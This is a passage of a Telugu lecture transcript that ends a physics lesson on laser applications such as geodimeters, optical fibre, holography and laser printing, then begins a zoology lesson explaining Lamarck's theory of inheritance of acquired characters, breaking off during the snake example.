నుంచి ఎంత హైట్లో ఉన్నాయి కూడా ఈ లేజర్ అల్టిమీటర్ను ఉపయోగించి మనం మెజర్ చేయొచ్చు. ఇందులో వాడేది హీలియం నియాన్ లేజర్. నెక్స్ట్ సర్వేయింగ్. ఈ సర్వేయింగ్ డివైసెస్లో మనం ఎక్కువగా వాడేది జియోడీమీటర్. ఈ జియోడీమీటరు ఏ ప్రిన్సిపల్పై ఆధారపడుతూ పనిచేస్తుంది. ఈ జియోడీమీటర్ ఏం చేస్తుందంటే దీని నుంచి ఎలక్ట్రోమాగ్నెటిక్ వేవ్స్ని పంపి ఎలక్ట్రోమాగ్నెటిక్ వేవ్స్ ఆ మీడియంలో ఎంత టైంలో ట్రావెల్ చేస్తాయి ఆ టైంని క్యాలిక్యులేట్ చేసి దాని నుంచి డిస్టెన్సెస్ని మెజర్ చేస్తాయి. సో ఈ జియోడీమీటర్లో మనకి అబ్జర్వ్ చేస్తే దాని ఫంక్షన్లో ఒక లైట్ సోర్స్ అనేది వాడడం అవసరం అవుతుంది. ఈ లైట్ సోర్స్ కనుక మనం లేజర్ లైట్ సోర్స్ వాడితే మనకి యాక్యురేట్ మెజర్మెంట్స్ వస్తాయి, అదేవిధంగా ఫాస్టర్ మెజర్మెంట్స్ వస్తాయి, అదేవిధంగా లాంగ్ రేంజ్ మెజర్మెంట్స్ వస్తాయి. సిమిలర్గా ఆప్టికల్ ఫైబర్ కమ్యూనికేషన్. ఈ ఆప్టికల్ ఫైబర్ కమ్యూనికేషన్లో ఎప్పుడైతే ఇన్ఫర్మేషన్ మొత్తం లైట్ వేవ్ రూపంలోకి మారుతుందో ఆ సమయంలో మొత్తం ఇన్ఫర్మేషన్ మొత్తం కూడా చాలా ఫాస్ట్గా మనకి రిసీవింగ్ ఎండ్కి వెళ్తుంది. ఈ రిసీవింగ్ ఎండ్ వెళ్ళడం వల్ల ఇన్ఫర్మేషన్ చాలా తక్కువ టైంలో ఒక ఎండ్ నుంచి ఇంకొక ఎండ్కి ట్రావెల్ చేస్తుంది. దీస్ ఆర్ ద అడ్వాంటేజెస్ ఆఫ్ ద లేజర్ ఫైబర్ ఆప్టికల్ ఫైబర్ కమ్యూనికేషన్. అదేవిధంగా డేటా స్టోరేజ్. ఒక థిన్ ఫిల్మ్ మీద మనకి హై ఎనార్మస్ డేటా అనేది లేజర్స్ ఉపయోగించి స్టోర్ చేయొచ్చు. దీస్ ఆర్ ద రీడ్ అండ్ రైట్ లేజర్స్ విచ్ ఆర్ యూజ్డ్ ఫర్ రీడింగ్ ఆర్ రైటింగ్ ద ఇన్ఫర్మేషన్. కాకపోతే ఈ డేటా స్టోరేజ్ వల్ల మనకు వచ్చే మెయిన్ డిసడ్వాంటేజ్ ఏంటంటే మనకి అది నాట్ ఎరేజబుల్. అదేవిధంగా హాలోగ్రఫీ.
హాలోగ్రఫీ ఏంటంటే 3D ఇమేజెస్ని ప్రొడ్యూస్ చేయడానికి ఉపయోగపడుతుంది. సో దిస్ ఈజ్ ద 3D ఇమేజ్ ఆఫ్ బ్రెయిన్ అండ్ దిస్ ఈజ్ ద 3D ఇమేజ్ ఆఫ్ ద గ్లోబ్. అదేవిధంగా ప్రింటింగ్ సెక్టర్లో మనం లేజర్ ప్రింటర్స్ మన డే టు డే లైఫ్లో చాలా వాడుతున్నాం. అదేవిధంగా హై స్పీడ్ ఫోటోగ్రఫీ అంటే ఒక బుల్లెట్ని, ఒక గన్ నుంచి వస్తున్న బుల్లెట్ని ఫోటోగ్రాఫ్ చేయడంలో కానీ లేదా ఆర్మర్ పెనిట్రేషన్స్లో కానీ మనం ఈ లేజర్ లైట్ని వాడడం వల్ల మనకు ఆ ఫోటోగ్రఫీ అనేది క్లియర్గా వస్తుంది. నెక్స్ట్ డిఫరెంట్ రీసెర్చ్ ఫీల్డ్స్లో వాడచ్చు వీటిని మనం. ఫీల్డ్ ఆఫ్ ఫిజిక్స్ ఆర్ కెమిస్ట్రీ అండ్ బయాలజీ. అదేవిధంగా మనకి ఎంటర్టైన్మెంట్ సెక్టర్లో కూడా మనం వీటిని బాగా వాడచ్చు. డిఫరెంట్ ఫోర్ట్స్లో మనకి లేజర్ లైట్ షోస్ ఉంటున్నాయి. సో ఈ లేజర్ లైట్ షోస్ హై ప్రొజెక్టెడ్ లేజర్ బీమ్స్ అనేవి మ్యూజిక్తో పాటు డాన్స్ అవుతుంటాయి. అదేవిధంగా మనకు డిఫరెంట్ మూవీస్లో స్పెషల్ ఎఫెక్ట్స్ అనేవి ఈ లేజర్ లైట్స్ వల్లే మనకి ప్రొడ్యూస్ అవుతున్నాయి. సో థ్యాంక్ యూ. ఈరోజు మనం ఈ పాఠ్యాంశంలో ద్వితీయ సంవత్సరం జంతుశాస్త్రానికి సంబంధించి జీవ పరిణామం అనేటటువంటి పాఠ్యాంశంలో కొన్ని ముఖ్యమైనటువంటి జీవ పరిణామ సిద్ధాంతాలను గురించి చర్చించుకుందాం. జీవ పరిణామానికి సంబంధించి ప్రారంభంలో నిర్జీవ సృష్టివాదం, ఎబయోజెన్సిస్ సిద్ధాంతం, ప్రత్యేక సృష్టివాదం అనేటటువంటి సిద్ధాంతాలను ప్రతిపాదించిన తరువాత మొదటగా శాస్త్రవేత్తలందరికీ ఆమోదయోగ్యమైనటువంటి సిద్ధాంతాన్ని ప్రతిపాదించినటువంటి శాస్త్రవేత్త ఎవరంటే లామార్క్. సో లామార్క్ ప్రతిపాదించినటువంటి పరిణామ సిద్ధాంతాన్ని మనం మొదటగా చూద్దాం. లామార్క్ ప్రతిపాదించినటువంటి సిద్ధాంతాన్ని లామార్కిజం అంటాం. లామార్క్ ఏదైతే జీవ పరిణామానికి సంబంధించి సిద్ధాంతాన్ని ప్రతిపాదించారో ఆ ప్రతిపాదనలో ఉన్నటువంటి ముఖ్యమైనటువంటి అంశం ఏంటంటే ఆర్జిత గుణాల అనువంశికత, ఇన్హెరిటెన్స్ ఆఫ్ ఎక్వైర్డ్ క్యారెక్టర్స్ అంటాం దాన్ని. అంటే పరిణామ క్రమంలో చూసినప్పుడు, జీవ పరిణామం తీసుకున్నప్పుడు వాతావరణంలో సంభవించేటటువంటి మార్పులకు అనుగుణంగా జీవులు కొన్ని ప్రత్యేక మార్పులను పొందుతాయి. ఆ పొందినటువంటి మార్పులు ఏ రకంగా అనువంశికత చెందుతాయి అంటే తర్వాత తరాలకు అందజేయబడతాయో లామార్క్ వివరించడానికి ప్రయత్నం చేశారు. ఇక్కడ మనం మొదటగా గుర్తుపెట్టుకోవాల్సింది ఏంటంటే ఈ పరిణామ సిద్ధాంతాలన్నీ కూడా పరిణామం గురించి నిర్వచనం ఇవ్వలేదు, పరిణామం ఎలా జరిగిందో చెప్పడానికి ప్రయత్నం చేసింది. జీవ పరిణామం అంటే జీవ పరిణామం మనకు నిర్వచనం మనందరికీ తెలిసిందే. అంటే సరళమైనటువంటి జీవుల నుంచి సంక్లిష్టమైనటువంటి జీవుల యొక్క అభివృద్ధి, ఆ ప్రక్రియను అధ్యయనాన్ని మనం జీవ పరిణామానికి నిర్వచించుకుంటే ఆ ప్రక్రియ అనేది జీవ సంబంధంగా వాతావరణంతో మమేకమై ఏ రకంగా సంభవించిందో చెప్పడానికి ప్రయత్నం చేసినయే ఈ పరిణామ సిద్ధాంతాలు. మొదటగా మనం లామార్కిజం గురించి చూద్దాం. సో ఈ లామార్కిజం ఈ పాఠ్యాంశం యొక్క ముఖ్య ఉద్దేశం ఏంటంటే మనం మొదటగా లామార్కిజం అంటే ఏంటో చూస్తాం. తర్వాత జీవ పరిణామంలో లామార్కిజం యొక్క విశిష్టత, దాని యొక్క ప్రాముఖ్యత, అంటే అంతకుముందు చెప్పినటువంటి పరిణామ సిద్ధాంతాలన్నీ పరిగణలోకి తీసుకుంటే దానికిను ఇప్పుడు చెప్పబోయేటటువంటి లామార్కిజానికి ఉన్నటువంటి భేదం ఏమిటి, ఏ రకంగా లామార్క్ సిద్ధాంతం అనేది శాస్త్రవేత్తలు ఆమోదయోగ్యమైంది అనేది మనం గమనిస్తాం. తర్వాత లామార్క్ చెప్పినటువంటి లామార్కిజానికి సంబంధించి ఉదాహరణలు ఏ రకంగా ఉంటే చూద్దాం. సో ఈ పటంలో చూస్తే కనుక జీన్ బాప్టిస్ట్ డి లామార్క్ 1744 1829
ఈయన ఫ్రెంచ్ శాస్త్రవేత్త. జీవ పరిణామానికి సంబంధించి లామార్కిజం లేదా ఆర్జిత గుణాల అనువంశికత అనేటటువంటి సిద్ధాంతాన్ని ప్రతిపాదించారు. లామార్క్ రచించినటువంటి గ్రంథం తీసుకుంటే కనుక ఫిలాసఫీ జూలాజిక్ అనేటటువంటి గ్రంథాన్ని ఈ పరిణామ సిద్ధాంతాలకు సంబంధించినటువంటి పరిశోధనలు మరియు పరిణామ సిద్ధాంతాలకు సంబంధించినటువంటి అన్ని పరిశీలనల్ని క్రోడీకరించి రచించినటువంటి గ్రంథమే ఫిలాసఫీ జూలాజిక్. లామార్క్ సిద్ధాంతాన్ని, లామార్కిజం అంటే దాంట్లో ఏం వివరిస్తుంది? లామార్కిజం లేదా ఆర్జిత గుణాల అనువంశికత అనేది జీవ పరిణామానికి సంబంధించి లామార్క్ ప్రతిపాదించినటువంటి సిద్ధాంతం. లామార్కిజం విశ్లేషించేది ప్రధానమైనటువంటి అంశం ఏంటంటే కనుక ఆర్జిత గుణాల అనువంశికత. ఒక జీవి తన జీవిత కాలంలో ఏదైతే కొన్ని ప్రత్యేక లక్షణాలను పొందిందో ఆ పొందినటువంటి లక్షణాలని తరువాతి తరాలకి ఏ రకంగా సంక్రమింప చేస్తుంది అనేది లామార్కిజం యొక్క ప్రధానమైనటువంటి అంశంగా మనం పరిగణించవచ్చు. ఈ లామార్కిజంలో లామార్క్ ఏ రకంగా వాతావరణ పరిస్థితులు లేదా వాతావరణ మార్పులని జీవి మీద ప్రభావితం చేస్తాయి, జీవిని ప్రభావితం చేస్తాయని పరిగణలోకి తీసుకుంటూ చెప్పినటువంటి మొదటి అంశం ఏంటంటే బాహ్య వాతావరణంలోని మార్పులను బట్టి జీవులలో మార్పులు వస్తాయి. రెండో అంశం జీవులలో భిన్నత్వానికి కారణం మూల ప్రామాణికమైనటువంటి ఏకత్వం. సో లామార్కు తన సిద్ధాంతాన్ని, లామార్కిజం లేదంటే కనుక మనం ఆర్జిత గుణాల అనువంశికత మనం చెప్పుకున్నాం కదా, ఈ చెప్పేటప్పుడు ఆయన పరిశీలించినటువంటి అంశాలు ఈ రెండు ప్రధానమైనటువంటి అంశాలు. మొదటిది బాహ్య వాతావరణంలో మార్పులను బట్టి జీవులలో మార్పులు వస్తాయి. అంటే జీవులన్నీ కూడా జీవి చుట్టూ ఉన్నటువంటి వాతావరణాన్ని తీసుకుంటే కనుక మాధ్యమం లేదా వాతావరణం అనుకుంటాం. ఈ వాతావరణంలో సంభవించేటటువంటి మార్పులను బట్టి జీవులలో మార్పులు వస్తాయని ఫస్ట్ ప్రతిపాదన తను పరిశీలించినటువంటి మొదటి అంశం అది. రెండోది జీవులలో భిన్నత్వానికి కారణం మూల ప్రామాణికమైనటువంటి ఏకత్వం. ఇక్కడ ప్రతి జీవి ఇంకొక జాతి తీసుకున్నప్పుడు ఒక జాతికి ఇంకో జాతికి తేడాలు కనిపిస్తూ ఉంది. ఆ తేడా కనిపించడానికి కారణం ఏంటో వివరిస్తా ఆయన ఏం చెప్పాడంటే మౌలికంగా ప్రతి జీవి తీసుకున్నప్పుడు ఆ జీవికి ఉండవలసిన జంతు లక్షణాలు తీసుకుంటా ఉన్నప్పుడు ఆ అన్నీ కూడా సమానత్వాన్ని ప్రదర్శిస్తాయి. మనం జీవులు తీసుకుంటే కనుక జీవి యొక్క నిర్మాణాత్మక క్రియాత్మక ప్రమాణం కణమని చెప్తాం. ఏ జీవులైనా సరే ప్రాథమిక ప్రమాణం కణమైనప్పుడు అన్నిట్లోనూ ఏకత్వం ఉంది. కానీ క్రియాత్మకంగా తీసుకున్నప్పుడు దాంట్లో భిన్నత్వం అనేది ప్రారంభమవటం కారణంగా పరిణామం అనేది సాధ్యపడింది అనేటటువంటి లామార్క్ యొక్క వాదన అన్నమాట. కాబట్టి ఈ రెండు ప్రామాణిక అంశాలు, మొదటిదన్నా చుట్టూ ఉన్నటువంటి వాతావరణము జీవిలో మార్పులను కలగజేస్తుంది. రెండోది ఏమన్నా జీవులలో ఉన్నటువంటి ఏదైతే ఏకత్వం ఉందో, సిమిలారిటీ లేదా యూనిఫామిటీ ఉందో, అదేమవుతోంది కొన్ని సందర్భాలలో ఈ పర్యావరణ కారణాలు కావచ్చు, వాతావరణ కారణాలు కావచ్చు, దాని వలన ఏమవుతుంది భిన్నత్వానికి దారితీస్తోంది. సో ఏదైనా మార్పు అనేది సంభవిస్తోంది. ఈ మార్పు కారణంగా కొత్త జీవుల యొక్క ఆవిర్భావం జరుగుతుంది అని లామార్క్ యొక్క వాదన అన్నమాట. నెక్స్ట్ ఈ మార్పులు ఎలా సంభవిస్తాయి అనే దాని మీద లామార్క్ చెప్పినటువంటి విశ్లేషణ చూడండి. జీవుల శరీర భాగాలు జీవన అంతర్గత కారకాలతో ప్రభావితమయ్యి నిరంతరం పరిమాణంలో పెరుగుతాయి. సో ఫస్ట్ కాన్సెప్ట్ ఇప్పుడు ఏం చెప్పాడు? జీవి యొక్క పరిసరాల కారణంగా జీవిలో మార్పులు సంభవిస్తాయని లామార్క్ ప్రతిపాదించాడు. ఓకే కాదంట్లా ప్రతిపాదించాడు. ఈ ప్రతిపాదనకి ఏం చేశాడు? ఆయన రుజువు చూపించాడు కదా. చూపించేటటువంటి ప్రయత్నంలో ఏం చెప్పాడు? ఫస్ట్ చెప్పింది జీవుల శరీర భాగాలు జీవన అంతర్గత కారకాలతో ప్రభావితమై నిరంతరం పరిమాణంలో పెరుగుతాయి అని చెప్పాడు. అంటే ఏంటి? ప్రతి జీవికి శరీరంలో శరీర భాగాలు ఉంటాయి. శరీర భాగాల యొక్క క్రియాశీలత అనేది వాతావరణం చేత ప్రభావితం చేయబడి వాటి యొక్క పెరుగుదల ఉంటుందని ప్రతిపాదించాడు. అంటే ఏదైతే అవయవం అవసరం అవుతుందో ఆ అవసరం అయ్యేటటువంటి అవయవం పెరుగుదల చూపిస్తూ ఉంటుంది. సో సాధారణ జీవి ఇక్కడ ఈ పెరుగుదల కలిగినటువంటి ఒక అవయవంలో పెరుగుదల కలిగినటువంటి జీవిని మనం తీసుకున్నప్పుడు ఆ జీవికి ఈ జీవికి ఆ క్రియాత్మక దృష్ట్యా మొదట్లో తేడా అనేది అక్కడ సంభవిస్తుంది ఫస్ట్. సో ఇది ప్రాథమిక అంశం, మూల అంశం. రెండు మూల అంశాల్లో ఇది ప్రాథమిక మూల అంశం అన్నమాట. సో ఆయన చెప్పింది ఏంటంటే అంతర్గత కారకాలు
ఈ బాహ్య వాతావరణం ఒక అంశం తీసుకున్నాడు, రెండో అంశం ఏంటంటే అంతర్గత కారకాలు కూడా చెప్తున్నాడు. ఏదైతే జీవి లోపల అంతర్గతంగా ఉన్నటువంటి అంశాలు, శరీర ధర్మపరమైనటువంటి క్రియలు ఉన్నాయి చూసారా, అవి ఈ బాహ్య వాతావరణం చేత ప్రభావితమయ్యి మార్పులు అనేవి సంభవిస్తాయి. సో ఈ మార్పు అనేది మనం ప్రామాణికంగా మనం తీసుకుంటాం. నెక్స్ట్ తర్వాత ఏం చెప్పారో చూడండి. కొత్త అవసరాలకు అనుగుణంగా కొత్త శరీర భాగాలు అభివృద్ధి చెంది స్థిరంగా నిలిచిపోతాయి. వీటినే ఆర్జిత గుణాలు అంటారు. సో ఇంకొక ఇంపార్టెంట్ కాన్సెప్ట్, మనం జీవ పరిణామంలో లామార్క్ చెప్పినప్పుడు లామార్క్ సిద్ధాంతం పేరే ఆర్జిత గుణాల అనువంశికత అని అన్నాం. ఇందాక మనం ఫస్ట్లో మాట్లాడుకున్నాం జీవి యొక్క పరిసరాలలో మార్పులు అని చెప్పాం. పరిసరాలలో మార్పులు ఏం చేస్తున్నాయి? కొత్త అవసరాలను సృష్టిస్తున్నాయి. కొత్త అవసరాలకు అనుగుణంగా జీవులు ఏం చేస్తాయి? ఆ అవసరాలకి అనుగుణంగా కొత్త శరీర భాగాలను అభివృద్ధి చేసుకుంటాయి. అంటే దేహ నిర్మాణంలో చిన్న చిన్న మార్పులు, అంటే ఒక్కసారిగా ఆల్ ఆఫ్ సడన్గా రాదు. కొన్ని వందల వేల సంవత్సరాల పరిణామక్రమం తీసుకున్నప్పుడు మార్పులన్నీ మనం అబ్జర్వ్ చేయగలం. సో కొత్త శరీర భాగాల అభివృద్ధి అనేది జరుగుతూ ఉంటుంది. ఇది బాహ్య వాతావరణంలో మార్పులు. బాహ్య వాతావరణంలో మార్పులకు అనుగుణంగా జీవులలో అవసరాలు మారతాయి. మారినటువంటి అవసరాలకు అనుగుణంగా ఏమవుతుంది? శరీర భాగాల మార్పు జరుగుతుంది. సో శరీర భాగాల మార్పు ఎప్పుడైతే సాధ్యపడిందో, శరీర భాగాల మార్పు ఎప్పుడైతే జరిగిందో, ఈ జరిగిన కారణంగా ఏం జరుగుతుంది? అక్కడ ఉన్నటువంటి జీవిలో, అక్కడ ఉన్నటువంటి జాతిలో చిన్న మార్పు, ఫస్ట్ మొట్టమొదటిగా తీసుకుంటే కనుక చాలా నెగ్లిజిబుల్, మనము లెక్కించలేనటువంటి, గుర్తించలేనటువంటి మార్పు అనేది మనం గమనిస్తాం. కాలక్రమంలో ఏమవుతుందంటే ఈ మార్పు, ఈ అభివృద్ధి చెందినటువంటి లేదా ఏర్పడినటువంటి మార్పు, దానికి ఆర్జిత గుణం, అది ఆ జీవే పొందింది, పక్క జీవికి లేదు. ఎందుకని? ఈ జీవే మారినటువంటి వాతావరణానికి గురి కాబడింది, లేదా మారినటువంటి వాతావరణంలో ఉంది, ఉండడానికి వీలుగా అనుకూలత పొందింది. అనుకూలత పొందడంతో పాటుగా అవయవాలలో మార్పును చేసుకుంది. సో ఇలా మార్పులు ఏర్పడినటువంటి మార్పులు ఆ జీవులు తమ జీవిత కాలంలో అలా పొందుపరుచుకుంటాయి. దాంతోపాటుగా ఈ పొందుపరుచుకున్నటువంటి మార్పులు ఏం చేస్తున్నాయి? తర్వాతి తరాలకి అందించేటటువంటి ప్రయత్నం చేస్తాయి. సో దీనినే మనం ఆర్జిత గుణాలు అని అంటున్నాం. దీనినే మనం ఆర్జిత గుణాలు అని పేర్కొంటున్నాం. తర్వాత అంశం చూడండి. కొత్త అవసరాలకు అనుగుణంగా కొత్త వాతావరణంలో అనుకూలతల కోసం జీవులు కొత్త అలవాట్లను, కొత్త ప్రవర్తనను అభివృద్ధి చేసుకుంటాయి. సో ఇందాకేం చెప్పాం మనము? అవయవంలో మార్పు వస్తుందని చెప్పాం. ఇప్పుడేం చెప్తున్నాము? అవయవంతో పాటుగా తన యొక్క ప్రవర్తన, జీవి ప్రవర్తనలో కూడా మార్పు వస్తుందని చెప్పాం. ఇక్కడ రెండో దానికి సింక్రనైజ్ చేశాడు. అంతకుముందు ఏం చెప్పాడు? అవయవంలో మార్పు వచ్చిందన్నాడు. అవయవంలో మార్పు వచ్చినప్పుడు ఆ అవయవంలో మార్పుకు అనుగుణంగా ఇంకేం జరిగింది గమనించాడు. అక్కడ మారినప్పుడు ఏం చెప్తున్నారు? కొత్త అవసరాలకు అనుగుణంగా కొత్త వాతావరణంలో జీవులు కొత్త ప్రవర్తన. సో మనకి కనిపించేది, ఇంతకుముందు ఏం చెప్పాము? అంతర్గత కారకాల కారణంగా అంతర్గత మార్పులు వస్తున్నాయని చెప్పాం. ఇప్పుడు ఏం చెప్తున్నాం మనము? బహిర్గతంగా కూడా జీవికి బాహ్యంగా చూసినప్పుడు తన యొక్క ప్రవర్తనలో కూడా కొన్ని మార్పులని సంతరించుకుంటుంది, ఏర్పరచుకుంటుంది. సో మనం ఇక్కడ రెండు అంశాలు చూసాం. ఒకటి అవయవాలలో మార్పు అనేది ప్రారంభమైంది, రెండోది అలవాట్లు, వాటి యొక్క ప్రవర్తనలో కూడా మార్పు అనేది సాధ్యపడింది. తర్వాత చూద్దాం. సో ఈ కొత్త లక్షణాలు జీవులు పొందడానికి మార్గాలు ఏం చెప్పాడు? ఇప్పుడు రెండు అంశాలు స్థూలంగా, మౌలికంగా రెండు అంశాలు చెప్పాం. అవయవాలలో మార్పు, ప్రవర్తనలో మార్పు. సో ఈ మార్పులు పొందడానికి కారణాలు చెప్తా రెండు మార్గాలను చెప్పాడు డార్విన్ గారు. ఒకటేమన్నా ఉపయుక్తత, ఒక అవయవాన్ని ఎక్కువగా ఉపయోగించుకోవటం. రెండోది నిరుపయుక్తత, ఒక అవయవాన్ని తక్కువగా ఉపయోగించుకోవటం. అంటే అవసరాలు, మార్పులను బట్టి అవయవాల యొక్క వినియోగంలో తేడా ఉంటుంది. ఎక్కువ ఉపయోగిస్తే దాన్ని ఉపయుక్తత అంటాం, తక్కువగా కనుక ఉపయోగిస్తే కనుక దాన్ని నిరుపయుక్తత అంటాం. సో ఈ అలవాట్ల కారణంగా కానీ, ప్రవర్తన కారణంగా కానీ ఏమవుతుందంటే కొన్ని అవయవాలు ఎక్కువగా వినియోగం జరగవచ్చు, లేదంటే కొన్ని అవయవాలు తక్కువగా వినియోగం కూడా జరగవచ్చు. సో ఇందాక మనం చెప్పుకున్న వాతావరణంలో మార్పులు ఎలా వస్తాయి అని.
వాతావరణంలో ఉష్ణోగ్రత, కాంతి, మాధ్యమం, ఆహారం జీవులు తీసుకునే ఆహారంలో మార్పుల కారణంగా జీవి యొక్క ప్రవర్తనలోనూ చెప్పుకున్నాం మనం. ఆ మార్పులు ఎలా సాధ్యపడుతున్నాయి చూసుకుంటే కనుక ప్రవర్తన, బిహేవియర్ మరియు శరీర ధర్మక్రియలలోనూ ఫిజియలాజికల్గా కూడా దాంట్లో మార్పులు అనేవి సంభవిస్తాయి. సో వాతావరణంలో సంభవించేటటువంటి ఈ మార్పులు ఉష్ణోగ్రత, కాంతి కానీ, మాధ్యమం కానీ, ఆహారం కానీ అవి తీసుకునేటువంటి దాంట్లో మార్పులు కనుక ఏర్పడితే జీవి యొక్క ప్రవర్తనలో మార్పు ఏర్పడుతుంది. ఆ ప్రవర్తనలో మార్పు ఏం చేస్తుందంటే చివరికి ఇంటర్నల్గా అంతర్గతంగా ఉన్నటువంటి శరీర ధర్మక్రియలలో కూడా మార్పుని కలగజేస్తుంది. సో ఇక్కడ ఏం చెప్తున్నామంటే మనం ఉపయుక్తత నిరుపయుక్తత సూత్రం ఆధారంగా శరీర భాగాలు ఏర్పడటం అంటే ఏదైతే అవయవం ఎక్కువగా ఉపయోగపడినటువంటి అవయవం అభివృద్ధి చెందుతుంది. అంతకు ముందున్నటువంటి జీవికి దానికి తేడా చూసినప్పుడు ఆ అవయవం ఎక్కువ ఉపయోగపడింది కాబట్టి ఆ అవయవంలో మార్పు వచ్చింది. నిరుపయుక్తత తీసుకున్నప్పుడు అంతకు ముందున్నటువంటి జీవులు తీసుకున్నప్పుడు అదే జాతికి చెందినటువంటి అంతకు ముందున్నటువంటి జీవిని తీసుకున్నప్పుడు ఈ జీవికి తీసుకున్నప్పుడు ఈ జీవిలో ఈ అవయవం యొక్క ఉపయోగం అనేది తక్కువైంది కాబట్టి ఈ అవయవము పనికి రాకుండా అంటే దాని ఏమంటే మనం అవశేష అవయవంగా లేదంటే తక్కువ స్థాయిలో వినియోగించటం వల్ల దాని యొక్క పరిణామం ఏమైంది క్రమంగా తగ్గుతూ జరిగింది. ఆ కారణంగా ఏమవుతాయి మొదటగా మనకి మార్పులు లేదా వైవిధ్యాలు ఏర్పడ్డాయి. సో ఇక్కడ మనం వైవిధ్యాలు అనేవి జీవ పరిణామానికి సంబంధించి ప్రమాణంగా లామార్క్ సూత్రం ప్రకారం మనం తీసుకోవచ్చు. సో వైవిధ్యం అనేది ఎట్లా వచ్చిందంటే రెండు ప్రక్రియల ద్వారా. మొదటిది ఉపయుక్తత, రెండోది నిరుపయుక్తత. ఉపయుక్తత కారణంగా ఏమవుతోంది అవయవం ఎక్కువగా ఉపయోగించబడి అవయవంలో మార్పు ఏర్పడి క్రొత్త అవయవంగా మార్పు చెందేటటువంటి ప్రక్రియ అది ఉపయుక్తత. నిరుపయుక్తతలో ఏమవుతోంది అవయవం తక్కువగా కనిష్ట స్థాయిలో వినియోగించుకోబడి అవయవంలో మార్పు చెంది సాధారణ అవయవానికి దానికి మార్పు ఏర్పడు. సో ఇక్కడ మనం తీసుకున్నప్పుడు ఏమవుతోంది ఇక్కడ సాధారణ అవయవానికి ఈ మార్పు చెందినటువంటి అవయవానికి మధ్య మనం నిర్దిష్టమైనటువంటి తేడాన్ని చూస్తున్నాం. ఆ తేడానే మనం వైవిధ్యం అని పేర్కొన్నాం. లామార్క్ దృష్ట్యా దాన్ని వైవిధ్యాలు అన్నాడు. ఈ వైవిధ్యాలే జీవ పరిణామానికి సంబంధించి ప్రాథమిక ప్రమాణాలుగా మనం లామార్క్ సిద్ధాంతంలో పేర్కొనడం అనేది జరుగుతుంది. ఒక జీవితకాలంలో ఏర్పరచుకున్నటువంటి ప్రతి లక్షణము భద్రపరచబడి తర్వాతి తరాలకు అందజేయడం జరుగుతుంది. దీన్ని ఆర్జిత గుణాల అనువంశికత అంటాం. లామార్క్ సిద్ధాంతాన్నే మనం ఇందాక చెప్పుకున్నాం ఆర్జిత గుణాల అనువంశికత అని. ఇప్పుడు ఏదైతే వైవిధ్యం ఒక జీవి పొందినదో ఏది ఉపయుక్తత కారణంగా కానీ నిరుపయుక్తత కారణంగా కానీ పొందినటువంటి వైవిధ్యాన్ని జీవి ఏం చేస్తుంది ఆ తరంలోనే కాకుండా తర్వాతి తరానికి అందచేయడానికి ప్రయత్నం చేస్తుంది మరియు అందిస్తుంది కూడా. ఆ అందించేటటువంటి లక్షణాన్ని అందించేటటువంటి ప్రక్రియనే మనం ఏమంటున్నామంటే ఆర్జిత గుణాల అనువంశికత. ఇలా అందచేయటం కారణంగానే ఏం జరుగుతుంది అక్కడ అంతకు ముందున్నటువంటి జాతికి తర్వాత వచ్చినటువంటి తర్వాతి తరానికి మధ్య తేడా అనేది కనిపిస్తుంది. సో జీవులలో వైవిధ్యాలు వాతావరణం వల్ల ఏర్పడతాయని పేర్కొన్నాడు. కంక్లూజన్ చేసేటప్పుడు ఏం చెప్పాడు లామార్కు ఈ తేడాలు ఇందాక చెప్పాం కదా వైవిధ్యాలు ఉపయుక్తత లేదా నిరుపయుక్తత రెండు కూడా చెప్పాడు. ఆయన చెప్పినటువంటి అంశాలు ఎలా వస్తాయి అన్నాడు వాతావరణ ప్రభావం. ఆయన చెప్పిందల్లా ప్రాథమిక అంశం ఏంటంటే వాతావరణ ప్రభావం అంటే చుట్టూ ఉన్నటువంటి వాతావరణంలో సంభవించే మార్పుల కారణంగా జీవులలో మార్పులు వస్తాయి అనేటట్టు ఆయన వాదన. ఒక జాతి చుట్టూ ఉన్నటువంటి వాతావరణం మారినట్లయితే ఆ జీవి అవసరాలు కూడా మారుతాయి. సో ఇందాకే చెప్పుకున్నాం చుట్టూ ఉన్నటువంటి వాతావరణం అంటే లామార్క్ చెప్పినటువంటి ప్రధానమైనటువంటి అంశం ఏంటంటే వాతావరణం జీవి చుట్టూ ఉన్నటువంటి వాతావరణం జీవి ఏదైతే వాతావరణంలో నివసిస్తూ ఉందో ఆ నివసించేటటువంటి వాతావరణంలో గనక మార్పు సంభవిస్తే తప్పనిసరిగా ఆ జీవి యొక్క నిర్మాణం కావచ్చు లేదా క్రియాశీలత కావచ్చు బాహ్య నిర్మాణం కావచ్చు దాంట్లో మార్పు సంభవిస్తుంది అని లామార్క్ వాదన. సో ఈ అవసరాలు ఏవైతే ఉన్నాయో ఆ మారిన అవసరాలకు అనుగుణంగా శరీర భాగాలు ప్రత్యేక ఉపయోగానికి కానీ నిరుపయోగం కానీ దారితీస్తాయి. దాన్నే మనం ఉపయుక్త నిరుపయుక్త సూత్రం అని చెప్పుకున్నాం. సో నిరంతరం ఉపయోగంలో ఉన్నటువంటి శరీర భాగాలు బాగా పెరిగి ఉపయోగించని భాగాలు క్రమంగా క్షీణించిపోతాయి.
వీటిని ఏమన్నా మనము ఆర్జిత గుణాలు అంటాం. ఇవి తర్వాతి లక్షణాలకి అందచేయబడతాయి, తర్వాతి తరాలకి. తర్వాత లామార్క్ ఉదాహరణగా ఏం చెప్పాడు, ఉపయుక్తతకి సంబంధించి జిరాఫీని పేర్కొన్నారు, నిరుపయుక్తతకి సంబంధించి పాములను పేర్కొన్నాడు. ఉపయుక్తతకి సంబంధించి జిరాఫీలు ఏం చెప్తారు, జిరాఫీ కూడా ఇప్పుడు ఉన్నటువంటి సాధారణంగా ఉన్నటువంటి లేళ్ళు దుప్పులు ఉన్నాయి చూసారా, అలాగే అదే రకమైనటువంటి జీవి. కాకపోతే ఈ మైదానాలలో, పచ్చిక మైదానాలలో గడ్డి కొరత కారణంగా చెట్లపై ఉన్నటువంటి ఆకులను అందుకునేటటువంటి క్రమంలో మెడను నిరంతరంగా చాచడం వలన పొడవైనటువంటి మెడతో పాటుగా పూర్వాంగాలు కూడా పొడవుగా సాగి పొడవైనటువంటి మెడ కలిగినటువంటి జిరాఫీ అభివృద్ధి చెందిందని చెప్పారు. నిరుపయుక్తతకు సంబంధించి పాములు పేర్కొన్నాడు. పాములు సరీసృపాల్లో ఉన్నటువంటి మనకి మొసళ్ళు కావచ్చు, తాబేళ్లు కావచ్చు, బల్లులు కావచ్చు, వాటికి మళ్ళీ పూర్వాంగాలు చర్మాంగాలు కూడా ఉండేవి. కానీ 